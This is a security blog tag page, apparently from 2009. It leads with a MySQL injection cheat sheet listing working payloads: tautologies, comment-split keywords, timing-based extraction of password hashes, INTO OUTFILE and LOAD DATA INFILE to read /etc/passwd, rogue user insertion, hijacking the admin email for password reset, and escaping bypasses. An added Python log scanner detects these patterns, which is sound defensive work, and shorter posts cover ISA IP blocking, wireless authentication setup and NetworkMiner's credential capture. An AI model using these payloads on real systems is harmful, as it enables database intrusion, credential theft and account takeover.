Posts Tagged ‘Network Security’

MySQL Injection Cheat Sheet

Posted in Security  by kissdeath on May 1st, 2009

This is a collection of methods for getting around the security measures admins put in place against SQL injection.

Basics.

SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Variations.

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION()
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db from mysql.db
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;

Blind injection vectors.

Operators

SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;

Evaluate

all render TRUE or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);

Math

SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);

Misc

SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');

Benchmark

SELECT BENCHMARK(10000000,ENCODE('abc','123'));
this takes around 5 sec on a localhost

SELECT BENCHMARK(1000000,MD5(CHAR(116)))
this takes around 7 sec on a localhost

SELECT BENCHMARK(10000000,MD5(CHAR(116)))
this takes around 70 sec on a localhost

Using the timeout to check if user exists

SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Beware of the N rounds: add an extra zero and it could stall or crash your browser!

Gathering info

Table mapping

SELECT COUNT(*) FROM tablename

Field mapping

SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping

SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors

Writing info into files

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)

SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))
INTO OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))

Note: you must specify a new file (it must not already exist) and give the correct pathname!

The CHAR() quoteless function

SELECT * FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))

SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes

SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

example:

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),null) FROM login

explaining: SUBSTRING(passwordfield, startcharacter, selectlength)

(password,1,2) selects: 'ab'
(password,1,3) selects: 'abc'
(password,1,4) selects: 'abcd'

A quoteless example:

SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

Possible chars: 0 to 9 (ASCII 48 to 57) and a to z (ASCII 97 to 122)

Misc

Insert a new user into DB

INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user

load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =
'r00t', pass = 'abc'

Then login!

Write the DB user away into tmp

SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for "forgot login retrieval."

UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';

Bypassing PHP functions

(MySQL 4.1.x before 4.1.20 and 5.0.x)

Bypassing addslashes() with GBK encoding

WHERE x = 0xbf27admin 0xbf27

Bypassing mysql_real_escape_string() with BIG5 or GBK

Additional information regarding the "injection string":

the above chars are Chinese Big5

Advanced Vectors

Using a HEX-encoded query to bypass escaping.

Normal:

SELECT * FROM login WHERE user = 'root'

Bypass:

SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL.

Normal:

insert into login set user = 'root', pass = 'root'

Bypass:

insert into login set user = 0x726F6F74, pass = 0x726F6F74

How to determine the HEX value for injection.

SELECT HEX('root');

gives you:

726F6F74

then add 0x before it.
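Seen from the defender's side, the tricks collected above (inline-comment splitting, CHAR() and CONCAT(CHAR()) literals, 0x hex literals, the BENCHMARK() timing oracle, INTO OUTFILE and LOAD DATA INFILE) all leave distinctive traces in the MySQL general query log. The following Python is an added example, not part of the original cheat sheet: it de-obfuscates logged statements so an analyst sees the plain query, then flags the patterns this page describes. The log lines are constructed and the signature names are my own.

```python
import re

# Constructed statements in the style of a MySQL general query log (not from the original page).
SAMPLE_LOG = [
    "SELECT * FROM login WHERE id = 7",
    "SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1",
    "SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))",
    "SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')), NULL) FROM login",
    "SELECT * FROM login WHERE user = 0x726F6F74",
    "SELECT password FROM login WHERE user = 'root' INTO OUTFILE '/var/www/passes.txt'",
]
CHAR_CALL = r"\bCHAR\(\s*[\d\s,]+\)"

def _chars(match):
    """Decode the integer arguments of one or more CHAR(...) calls into a quoted string literal."""
    text = "".join(chr(int(n)) for n in re.findall(r"\d+", match.group(0)))
    return text if text.startswith("'") else "'" + text + "'"

def _hex(match):
    """Decode an even-length 0x... literal to 'text' when it is printable ASCII; else leave it."""
    raw = bytes.fromhex(match.group(1)) if len(match.group(1)) % 2 == 0 else b"\x00"
    return "'" + raw.decode("ascii") + "'" if all(32 <= b < 127 for b in raw) else match.group(0)

def normalize(stmt):
    """Undo the cheat sheet's obfuscations so signatures (and analysts) see the plain query."""
    s = re.sub(r"/\*.*?\*/", "", stmt)                                # WHE/**/RE -> WHERE
    s = re.sub(rf"CONCAT\(\s*{CHAR_CALL}(?:\s*,\s*{CHAR_CALL})*\s*\)", _chars, s, flags=re.I)
    s = re.sub(CHAR_CALL, _chars, s, flags=re.I)                      # CHAR(39,97,39) -> 'a'
    s = re.sub(r"\b0x([0-9A-Fa-f]+)\b", _hex, s)                     # 0x726F6F74 -> 'root'
    return re.sub(r"\s+", " ", s).strip()

SIGNATURES = [
    ("timing-oracle", re.compile(r"\bBENCHMARK\s*\(\s*\d{6,}", re.I)),      # the N-round stall oracle
    ("tautology", re.compile(r"\bOR\s+(\d+)\s*=\s*\1\b", re.I)),            # or 1=1
    ("file-write", re.compile(r"\bINTO\s+OUTFILE\b|\bLOAD\s+DATA\s+INFILE\b", re.I)),
    ("stacked-query", re.compile(r";\s*(?:SHOW|SELECT|INSERT|UPDATE)\b", re.I)),
    ("hash-probe", re.compile(r"\bSUBSTRING\s*\(\s*\w*pass\w*\s*,", re.I)), # char-by-char extraction
]

def triage(stmt):
    """Return (normalized statement, matched signature names, whether obfuscation was removed)."""
    plain = normalize(stmt)
    hits = [name for name, rx in SIGNATURES if rx.search(plain)]
    return plain, hits, plain != re.sub(r"\s+", " ", stmt).strip()

def scan(lines):
    """Keep only statements that matched a signature or had to be de-obfuscated."""
    return [result for result in map(triage, lines) if result[1] or result[2]]
```

scan(SAMPLE_LOG) keeps five of the six statements; only the first, a plain lookup with no encoding tricks, passes untouched.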


Block country’s IP range using ISA: HammerOfGod Computer Sets

Posted in Security, Tips-Thủ thuật  by kissdeath on April 3rd, 2009

Go to the link below, choose the set for the country you want to block, download it, and import it into ISA.

http://www.hammerofgod.com/download/ISASets


Setting Up Secure Wireless Access – Part1

Posted in Vietnamese Articles  by kissdeath on February 8th, 2009

SETTING UP SECURE WIRELESS ACCESS WITH PEAP-MS-CHAP v2 AUTHENTICATION

I. Introduction:

The need to deploy wireless networks keeps growing. Wireless networks give users convenience (they can connect to the LAN or WAN from any location) and are very effective from an aesthetic standpoint... However, the issue to consider is that, because of this very convenience, any computer or device that has a wireless card can connect to your network over Wi-Fi. To raise the level of safety and security of wireless networks, manufacturers have built many security features into access points, such as WEP, WPA, WPA-PSK, 802.1X, or filtering by MAC address. In this article I will present a solution for deploying Secure Wireless Access with PEAP-MS-CHAP v2 authentication.

II. Topology:


Setting Up Secure Wireless Access – Part2

Posted in Vietnamese Articles  by kissdeath on February 8th, 2009

SETTING UP SECURE WIRELESS ACCESS WITH EAP-TLS AUTHENTICATION

I. Introduction:

After completing the Secure Wireless Access With PEAP-MS-CHAP v2 Authentication lab in part 1, we continue in part 2 with EAP-TLS Authentication.

II. Topology:


Network Security Analysis With Network Miner

Posted in Softwares  by kissdeath on January 29th, 2009

Network Miner is a portable open-source network security analysis tool that can monitor the traffic of a connected network adapter on the Windows operating system. It uses a built-in passive network sniffer / packet capture engine that can detect IPs, hostnames, operating systems, ports and various other information about every connection. The tool requires the separate installation of WinPcap to function properly and reliably.

The main purpose of Network Miner is data collection for later analysis (such as forensic evidence analysis) rather than gathering statistics about the traffic on the network. Information is grouped by host rather than by packets or frames, although it is easy to switch view modes in the software interface.

Network Miner can, among other things, extract files and certificates transferred over the network. This can be used to save media files that are streamed across the network.

Another interesting ability is the extraction of user credentials, that is usernames and passwords for supported protocols, which are then displayed in the credentials tab in Network Miner.
